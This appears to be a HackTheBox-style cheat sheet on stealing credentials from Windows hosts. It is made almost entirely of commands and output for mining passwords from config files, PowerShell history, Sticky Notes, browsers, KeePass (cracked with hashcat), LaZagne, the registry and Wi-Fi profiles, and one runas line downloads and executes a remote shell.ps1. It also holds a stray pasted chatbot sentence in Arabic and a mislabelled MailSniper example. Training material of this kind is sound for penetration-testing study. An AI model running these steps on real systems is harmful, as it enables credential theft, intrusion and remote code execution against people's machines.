H1HTB

Credential Theft

Application Configuration Files

PS C:\mrci0x1> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
settings.xml:105:<password>Pr0xyadm1nPassw0rd!</password>
settings.xml:121:NOTE: You should either specify username/password OR
settings.xml:127:<password>repopwd</password>
PS C:\mrci0x1> dir /s /b C:\ | findstr /i "web.config"
C:\inetpub\wwwroot\web.config
C:\inetpub\site2\web.config

Dictionary Files

PS C:\mrci0x1> gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
Password1234!
PS C:\mrci0x1> Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
C:\Users\Public\Documents\settings.xml:105:<password>Pr0xyadm1nPassw0rd!</password>
C:\Users\Public\Documents\settings.xml:127:<password>repopwd</password>

Unattended Installation Files

PS C:\mrci0x1> dir /s /b C:\ | findstr /i "unattend.xml"
C:\Windows\Panther\unattend.xml

Decode Base64 (example)

PS C:\mrci0x1> [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bG9jYWxfNGRtaW5fcEBzcw=="))
local_4dmin_p@ss

PowerShell History Files

PS C:\mrci0x1> (Get-PSReadLineOption).HistorySavePath
C:\Users\htb-student\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\mrci0x1> gc (Get-PSReadLineOption).HistorySavePath
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02
PS C:\mrci0x1> foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
dir
cd Temp
md backups
cp c:\inetpub\wwwroot\* .\backups\
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://www.powershellgallery.com/packages/MrAToolbox/1.0.1/Content/Get-IISSite.ps1'))
. .\Get-IISsite.ps1
Get-IISsite -Server WEB02 -web "Default Web Site"
wevtutil qe Application "/q:*[Application [(EventID=3005)]]" /f:text /rd:true /u:WEB02\administrator /p:5erv3rAdmin! /r:WEB02

PowerShell Export-Clixml Credentials

Decrypt Credential (if same user/session)

PS C:\mrci0x1> $encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\mrci0x1> $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
PS C:\mrci0x1> $decryptedPassword
SuperS3cretPassword!

Advanced (if SYSTEM access)

mrci0x1@htb$ mimikatz # dpapi::cred /in:C:\scripts\pass.xml
[DPAPI] Credential decrypted successfully: SuperS3cretPassword!

تمام، هعمله بنفس التنسيق اللي طلبته بالظبط:

Network Share Enumeration by Snaffler

mrci0x1@htb$ Snaffler.exe -s -o snaffler_output.txt -c domain.local -u username -p password
\\FILE01\users\bjones\passwords.txt
\\FILE01\backups\server.vhdx
\\FILE01\users\asmith\id_rsa

Manual File Content Searching

Basic Search (Command Prompt)

C:\mrci0x1> cd c:\Users\htb-student\Documents & findstr /SI /M "bob_adm" *.xml *.ini *.txt
stuff.txt

Detailed Search (Command Prompt)

C:\mrci0x1> findstr /si bob_adm *.xml *.ini *.txt *.config
stuff.txt:1:password: l#-x9r11_2_GL!
C:\mrci0x1> findstr /spin "bob_adm" *.*
stuff.txt:1:password: l#-x9r11_2_GL!

PowerShell Search

PS C:\mrci0x1> select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password
stuff.txt:1:password: l#-x9r11_2_GL!

File Extension Search

Using dir (Command Prompt)

C:\mrci0x1> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
c:\inetpub\wwwroot\web.config

Using where (Command Prompt)

C:\mrci0x1> where /R C:\ *.config
c:\inetpub\wwwroot\web.config

Using PowerShell

PS C:\mrci0x1> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
Directory: C:\inetpub\wwwroot

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/25/2021   9:59 AM            329 web.config

Sticky Notes Database (plum.sqlite)

Locate Database

PS C:\mrci0x1> cd C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
PS C:\mrci0x1> ls
15cbbc93e90a4d56bf8d9a29305b8981.storage.session
Ecs.dat
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

PowerShell — Extract Data Using PSSQLite

PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope Process
PS C:\mrci0x1> Import-Module .\PSSQLite.psd1

PS C:\mrci0x1> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'

PS C:\mrci0x1> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | Format-Table -Wrap
vCenter
root:Vc3nt3R_adm1n!

Linux — Extract Data Using strings

mrci0x1@htb$ strings plum.sqlite-wal
id=011f29a4-e37f-451d-967e-c42b818473c2 vCenter
id=ffaea2ff-b4fc-4a14-a431-998dc833208c root:Vc3nt3R_adm1n!

Other Sensitive Files (Manual Search)

PS C:\mrci0x1> Get-ChildItem -Path C:\Windows,C:\ProgramData,C:\Users -Recurse -Include *.log,*.sav,*.dat,*.evt -ErrorAction Ignore
Directory: C:\Windows\repair

sam
system
security

Cmdkey Saved Credentials

PS C:\mrci0x1> cmdkey /add:TERMSRV/SQL01 /user:inlanefreight\bob /pass:Str0ngP@ss123
PS C:\mrci0x1> cmdkey /list
Target: LegacyGeneric:target=TERMSRV/SQL01
Type: Generic
User: inlanefreight\bob
PS C:\mrci0x1> runas /savecred /user:inlanefreight\bob "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')"

Browser Credentials with SharpChrome

PS C:\mrci0x1> .\SharpChrome.exe logins /unprotect
[*] Triaging Chrome Logins for current user
[*] AES state key file : C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 5A2BF178278C85E70F63C4CC6593C24D61C9E2D38683146F6201B32D5B767CA0

--- Chrome Credential ---
file_path,signon_realm,origin_url,date_created,times_used,username,password
C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://vc01.inlanefreight.local/,https://vc01.inlanefreight.local/ui,4/12/2021 5:16:52 PM,13262735812597100,bob@inlanefreight.local,Welcome1

KeePass Database Extraction

PS C:\mrci0x1> Get-ChildItem -Path C:\,\\FILE01\users -Recurse -Include *.kdbx -ErrorAction Ignore
C:\Users\bob\Documents\ILFREIGHT_Help_Desk.kdbx
mrci0x1@htb$ python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx
ILFREIGHT_Help_Desk:$keepass$*2*60000*222*f49632ef7dae20e5a670bdec2365d5820ca1718877889f44e2c4c202c62f5fd5*2e8b53e1b11a2af306eb8ac424110c63029e03745d3465cf2e03086bc6f483d0*7df525a2b843990840b249324d55b6ce*75e830162befb17324d6be83853dbeb309ee38475e9fb42c1f809176e9bdf8b8*63fdb1c4fb1dac9cb404bd15b0259c19ec71a8b32f91b2aaaaf032740a39c154
mrci0x1@htb$ hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt
$keepass$*2*60000*...:panther1

MailSniper Email Search

PS C:\mrci0x1> Import-Module .\MailSniper.ps1
PS C:\mrci0x1> Invoke-PasswordSprayMailSniper -UsersFile users.txt -PasswordFile passwords.txt -Domain inlanefreight.local -Server exchange01.inlanefreight.local
Subject: New Admin Credentials
Body: 
Account: admin@inlanefreight.local
Password: Str0ngP@ss!

LaZagne Credential Extraction

PS C:\mrci0x1> .\lazagne.exe all
########## User: jordan ##########

------------------- Winscp passwords -----------------
[+] Password found !!!
URL: transfer.inlanefreight.local
Login: root
Password: Summer2020!

------------------- Credman passwords -----------------
[+] Password found !!!
URL: dev01.dev.inlanefreight.local
Login: jordan_adm
Password: ! Q A Z z a q 1

SessionGopher

PS C:\mrci0x1> Import-Module .\SessionGopher.ps1
PS C:\mrci0x1> Invoke-SessionGopher -Target WINLPE-SRV01
WinSCP Sessions
Source   : WINLPE-SRV01\htb-student
Session  : Default%20Settings

PuTTY Sessions
Source   : WINLPE-SRV01\htb-student
Session  : nix03
Hostname : nix03.inlanefreight.local

SuperPuTTY Sessions
Source        : WINLPE-SRV01\htb-student
SessionName   : NIX03
Host          : nix03.inlanefreight.local
Username      : srvadmin
Port          : 22

AutoLogon Credentials

PS C:\mrci0x1> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
AutoAdminLogon    REG_SZ    1
DefaultUserName    REG_SZ    htb-student
DefaultPassword    REG_SZ    HTB_@cademy_stdnt!

PuTTY Proxy Credentials

PS C:\mrci0x1> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
PS C:\mrci0x1> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
ProxyUsername    REG_SZ    administrator
ProxyPassword    REG_SZ    1_4m_th3_@cademy_4dm1n!

Wi-Fi Passwords

PS C:\mrci0x1> netsh wlan show profile
All User Profile     : ilfreight_corp
PS C:\mrci0x1> netsh wlan show profile ilfreight_corp key=clear
Key Content            : ILFREIGHTWIFI-CORP123908!
PreviousAttacking the OSNextCitrix Breakout

Last updated